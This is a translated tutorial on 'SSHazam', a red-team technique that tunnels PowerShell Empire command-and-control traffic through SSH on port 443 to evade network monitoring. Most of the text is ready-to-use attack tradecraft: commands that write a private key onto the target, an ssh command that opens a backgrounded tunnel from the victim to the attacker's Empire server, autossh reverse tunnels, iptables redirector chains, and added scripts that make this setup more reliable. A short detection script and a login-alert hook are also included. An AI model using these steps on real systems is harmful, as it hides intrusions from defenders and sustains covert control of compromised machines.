2025-04-09 Update From: SLTechnology News&Howtos
Shulou(Shulou.com) 06/02 Report--
This article explains in detail how SSHazam uses an SSH tunnel for covert C2 communication. We think it is quite practical, so we share it here as a reference; we hope you gain something from reading it.
SSHazam is a technique for hiding the traffic of any C2 tool inside a standard SSH channel, so that network surveillance sees nothing but SSH.
Straight to the point
In the demo below we run PowerShell Empire: the Empire agent on the target connects to a port on the target's own localhost, and a local SSH port forward carries that traffic to the remote Empire server, so the only thing a network sensor sees is an SSH session. The target system is OS X, but the same technique works on Windows using Plink.exe.
As shown above, the target system has an SSH tunnel listening on port 5430 that forwards everything it receives to the Empire server, where an Empire listener is bound to the same port on localhost (127.0.0.1:5430). To make the SSH traffic blend in better, the SSH server listens on port 443 instead of the standard port 22. Remember to set Port 443 in sshd_config (and restart sshd), and to open that port in the cloud firewall or security group.
Before the connection can be established you also need a private key on the target system, with the corresponding public key added to the authorized_keys file of the tunnel user on the Empire server. In the demo the private key is stored at ~/.ssh/.do.key on the target, written from the command line as follows (the key below is abbreviated):
mkdir ~/.ssh
chmod 700 ~/.ssh
echo "-----BEGIN RSA PRIVATE KEY-----" >> ~/.ssh/.do.key
echo "MIIJKAIBAAKCAgEArVuMJdwgl9z9s1C0mrYV05hwUevmY+CkJaY/1iiPJSE6/AAp" >> ~/.ssh/.do.key
echo "+qkMZ9nrHkBQtaQMrXPW5MQXLxU/o8LQ5QyPiy/B4FiGEfNSx//mSJvEYAXXN4zC" >> ~/.ssh/.do.key
echo "RkiQ5Eir83CLCZFLRWV8wFvNkGV2krxMXDtHHFL5ars/J7tdBekmYI62eXnE5oXl" >> ~/.ssh/.do.key
echo "NHky2x6YsnQf5lOkC1XyWvwg77gR2kRhb9KpOi+hp6xB42o00mpbZgyY5V4=" >> ~/.ssh/.do.key
echo "-----END RSA PRIVATE KEY-----" >> ~/.ssh/.do.key
chmod 600 ~/.ssh/.do.key
The key that sits on the target can be recovered by anyone who examines the machine, so limit what it can do on the Empire server: give the tunnel user no login shell by editing /etc/passwd and setting its shell to /bin/false. Port forwarding still works for that user, because the client connects with -N and never requests a shell:
victim:x:1001:1001:VictimGuy,,,:/home/victim:/bin/false
Once the private key is on the target system, a single command opens the SSH tunnel and the local port (-N runs no remote command, -f sends ssh to the background once authentication succeeds):
ssh -i ~/.ssh/.do.key -p 443 -N -f -o StrictHostKeyChecking=no victim@empire-server.corp.com -L 5430:127.0.0.1:5430
Now configure PowerShell Empire, or whatever C2 you use, to listen on 127.0.0.1:5430. From this point all C2 traffic rides inside the encrypted SSH channel, and port-based network monitoring sees nothing but SSH. One caveat: the payload is encrypted, but every SSH session still opens with a cleartext SSH-2.0 version banner, so a sensor that identifies protocols by content rather than by port will still log an SSH connection to 443.
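The following shell script is an added example, not code from the original post. It puts the steps above into functions with the checks an operator would want: a restricted authorized_keys entry for the tunnel user on the Empire server (so a key recovered from the target can only be used for this one port forward), an ssh command line that fails loudly instead of backgrounding silently when the local port cannot be bound, and a permission check on the key file. The host name, user name, key path and ports are the ones used in the demo; the script name and the --run argument are assumptions.

```shell
#!/usr/bin/env bash
# Added example for the SSHazam setup; not the original post's code.
# Assumed layout (matches the demo): sshd on empire-server.corp.com:443, tunnel
# user "victim", Empire listening on 127.0.0.1:5430 on the server, private key
# at ~/.ssh/.do.key on the target.

# Server side: authorized_keys entry for the tunnel user. "restrict" turns off
# pty, X11/agent forwarding and command execution; "port-forwarding" re-enables
# only forwarding, and permitopen pins -L targets to the Empire listener. A key
# lifted from the target then cannot be used for anything but this tunnel.
# $1 = public key line (contents of victim.pub), $2 = host:port the tunnel may reach
restricted_authorized_key() {
  printf 'restrict,port-forwarding,permitopen="%s" %s' "$2" "$1"
}

# Client side: the ssh command line the target runs. ExitOnForwardFailure makes
# ssh exit non-zero instead of backgrounding silently when local port $4 is
# already in use; IdentitiesOnly stops ssh from offering agent keys that would
# identify the operator; ServerAliveInterval notices a dead tunnel.
# $1 = key path, $2 = user@host, $3 = sshd port, $4 = local port, $5 = remote host:port
tunnel_cmd() {
  printf 'ssh -i %s -p %s -N -f -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -o IdentitiesOnly=yes -o ServerAliveInterval=30 -L %s:%s %s' \
    "$1" "$3" "$4" "$5" "$2"
}

# ssh refuses a private key that is group/world readable ("UNPROTECTED PRIVATE
# KEY FILE"), so verify mode 0600 first. Reading the mode string from ls -ld
# behaves the same on macOS and Linux.
key_mode_ok() {
  [ "$(ls -ld "$1" | cut -c1-10)" = "-rw-------" ]
}

# Stand-alone use on the target (assumed invocation):
#   ./sshazam.sh --run ~/.ssh/.do.key victim@empire-server.corp.com
if [ "${1:-}" = "--run" ]; then
  key_mode_ok "$2" || { echo "refusing: $2 must be mode 0600" >&2; exit 1; }
  eval "$(tunnel_cmd "$2" "$3" 443 5430 127.0.0.1:5430)"
fi
```

The restricted authorized_keys line is the piece the post leaves out: with the /bin/false shell alone, a stolen key can still open arbitrary -L forwards through the Empire server; with permitopen it can reach only the listener on 127.0.0.1:5430.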
Technical analysis
The basic technique is simple and gives you a C2 session directly. Sometimes, however, you do not want sensitive customer data sitting on a third-party cloud VM, so you add another redirector that forwards the cloud host's traffic into your own network. The whole chain looks roughly like the following figure:
C2 connections are forwarded to the Empire redirector over the SSH tunnel. iptables rules on the Empire redirector hand the traffic to a second redirector, and from there a reverse SSH tunnel, established from the attack host, carries it to its final destination on your own network.
The SSH command run on the target device is:
ssh -i ~/.ssh/.do.key -p 443 -N -f -o StrictHostKeyChecking=no victim@empire-redirector.corp.com -L 5430:127.0.0.1:5431
The SSH command run on the attack host is:
autossh -M 5431 -o ServerAliveInterval=30 -R 5433:10.10.10.185:5430 root@redirector.corp.com
You may need to install autossh first; it monitors the SSH tunnel and restarts it when it drops, which keeps the reverse connection alive over long periods.
The iptables rules for the Empire redirector are:
# locally generated connections to local addresses on ports 5430-65535 (sshd's forward to 127.0.0.1:5431) are sent to the final redirector
iptables -t nat -A OUTPUT -m addrtype --src-type LOCAL --dst-type LOCAL -p tcp -m multiport --dports 5430:65535 -j DNAT --to-destination 128.62.137.184:5432
# rewrite the source address so replies come back through this host
iptables -t nat -A POSTROUTING -m addrtype --src-type LOCAL --dst-type UNICAST -j MASQUERADE
# allow packets carrying 127/8 addresses to be routed off the loopback interface
sysctl -w net.ipv4.conf.all.route_localnet=1
With these rules in place, every connection the Empire redirector makes to a local port between 5430 and 65535 is redirected to the final redirector, so all of the target's traffic ends up there.
The iptables rules for the final redirector are:
sysctl -w net.ipv4.conf.all.route_localnet=1
# deliver inbound traffic on 5432 to the reverse tunnel's loopback listener on 5433
iptables -t nat -I PREROUTING -p tcp --dport 5432 -j DNAT --to 127.0.0.1:5433
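The two rule sets above, as an added example that is not the original post's script: it wraps each hop's iptables rules in a function, checks with iptables -C before appending so the script can be re-run after a reboot or a half-finished run without stacking duplicate rules, and prints the commands instead of running them when DRY_RUN=1 so they can be reviewed before touching a live redirector. Addresses and ports are the ones from the post; the PREROUTING rule is appended with -A rather than inserted with -I, which only matters if the nat table already holds other rules for that port.

```shell
#!/usr/bin/env bash
# Added example for the redirector chain; not the original post's script.
# Both hops assume Linux with iptables and root. Rules are emitted as complete
# command lines so they can be reviewed (DRY_RUN=1) or applied (default).

# Empire redirector: sshd's forwarded connections to 127.0.0.1:5431 are
# locally generated, so they traverse nat/OUTPUT. DNAT them to the final
# redirector and MASQUERADE so the replies come back to this host.
# $1 = final redirector address, $2 = port it accepts the hop on
empire_redirector_rules() {
  printf '%s\n' \
    "iptables -t nat -A OUTPUT -m addrtype --src-type LOCAL --dst-type LOCAL -p tcp -m multiport --dports 5430:65535 -j DNAT --to-destination $1:$2" \
    "iptables -t nat -A POSTROUTING -m addrtype --src-type LOCAL --dst-type UNICAST -j MASQUERADE"
}

# Final redirector: packets arriving on $1 go to the loopback listener that the
# attack host's "autossh -R $2:..." created.
final_redirector_rules() {
  printf '%s\n' "iptables -t nat -A PREROUTING -p tcp --dport $1 -j DNAT --to-destination 127.0.0.1:$2"
}

# Read rule commands on stdin. "iptables -C" asks the kernel whether an
# identical rule already exists; only append when it does not. DNAT to
# 127.0.0.1 is dropped as a martian unless route_localnet is on, so set it
# on both hops before the rules go in.
apply_rules() {
  [ "${DRY_RUN:-0}" = 1 ] || sysctl -w net.ipv4.conf.all.route_localnet=1 >/dev/null
  while IFS= read -r cmd; do
    [ -n "$cmd" ] || continue
    if [ "${DRY_RUN:-0}" = 1 ]; then
      printf '%s\n' "$cmd"
      continue
    fi
    check=$(printf '%s' "$cmd" | sed 's/ -A / -C /')
    # word-splitting the command strings is intended
    $check 2>/dev/null || $cmd
  done
}

# Usage on each hop, after reviewing the output with DRY_RUN=1:
#   empire_redirector_rules 128.62.137.184 5432 | DRY_RUN=1 apply_rules
#   final_redirector_rules 5432 5433 | apply_rules
```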
This may look complicated, but it is a practical way of keeping sensitive data off the cloud host.
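The claim that monitoring tools see "only SSH traffic" holds for port-based filters but not for protocol-aware sensors: Zeek, for instance, labels the application protocol from the cleartext SSH version banner regardless of the port. The script below is an added detection example, not part of the original post. It runs that check over a handful of constructed, simplified conn.log-style records (tab-separated, with made-up addresses and durations) and flags SSH sessions on anything other than tcp/22, optionally only those that have lived longer than a threshold, which is what an always-on -N or autossh tunnel looks like.

```shell
#!/usr/bin/env bash
# Added detection example; not from the original post. The records below are
# constructed and simplified (Zeek's real conn.log has more columns and a
# multi-line header); addresses, ports and durations are made up.
sample_conn_log() {
  printf 'ts\torig_h\torig_p\tresp_h\tresp_p\tproto\tservice\tduration\n'
  printf '1700000001.0\t10.0.0.21\t51234\t198.51.100.7\t443\ttcp\tssl\t12.5\n'
  printf '1700000002.0\t10.0.0.21\t51240\t198.51.100.9\t443\ttcp\tssh\t86400.0\n'
  printf '1700000003.0\t10.0.0.22\t51300\t203.0.113.5\t22\ttcp\tssh\t300.0\n'
  printf '1700000004.0\t10.0.0.23\t51400\t198.51.100.9\t8443\ttcp\tssh\t40.0\n'
  printf '1700000005.0\t10.0.0.24\t51500\t198.51.100.7\t443\ttcp\t-\t0.2\n'
}

# Read conn records on stdin and print "orig_h resp_h:resp_p duration" for
# every connection whose service was identified as ssh on a port other than 22.
# $1 = minimum duration in seconds (default 0); raising it isolates the
# long-lived sessions a persistent tunnel produces.
flag_ssh_off_port() {
  awk -F'\t' -v min="${1:-0}" '
    NR > 1 && $7 == "ssh" && $5 != 22 && ($8 + 0) >= (min + 0) {
      printf "%s %s:%s %s\n", $2, $4, $5, $8
    }'
}

# Example: sample_conn_log | flag_ssh_off_port 3600
```

On the sample records the default run reports the 443 and 8443 sessions, and a one-hour threshold leaves only the day-long session to 198.51.100.9:443, which is exactly the profile of the tunnel set up above.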
If you want to be notified whenever an SSH session is opened on the server, add the following two lines to /etc/pam.d/sshd (the first is the stock pam_selinux session line on Debian-based systems; the pam_exec line goes directly after it):
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open
session optional pam_exec.so /home/root/ssh-slack-alert.sh
The notification script skips the admin user and session-close events, and posts the PAM user, remote host and server hostname to a Slack webhook:
#!/usr/bin/env bash
# run by pam_exec; PAM_USER, PAM_TYPE and PAM_RHOST are set in the environment
if [ "$PAM_USER" != "admin" ] && [ "$PAM_TYPE" != "close_session" ]
then
  message="\`\`\`PamType: $PAM_TYPE\nSSH-User: $PAM_USER\nRhost: $PAM_RHOST\nServer: SSHazam\nHostname: $(hostname)\`\`\`"
  curl -X POST \
    --data-urlencode "payload={\"channel\": \"alerts\",\"username\": \"SSHazam\", \"text\":\"${message}\", \"icon_emoji\": \":boom:\"}" \
    https://hooks.slack.com/services/YOUR/SLACK/HOOKHERE
fi